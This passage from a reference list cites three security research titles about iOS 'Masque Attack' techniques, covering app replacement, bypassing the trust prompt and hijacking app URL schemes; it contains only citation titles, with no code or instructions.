[2] iOS Masque Attack Revived: Bypassing Prompt for Trust and App URL Scheme Hijacking
[3] Masque Attack: All Your iOS Apps Belong to Us
[4] Three New Masque Attacks against iOS: Demolishing, Breaking and Hijacking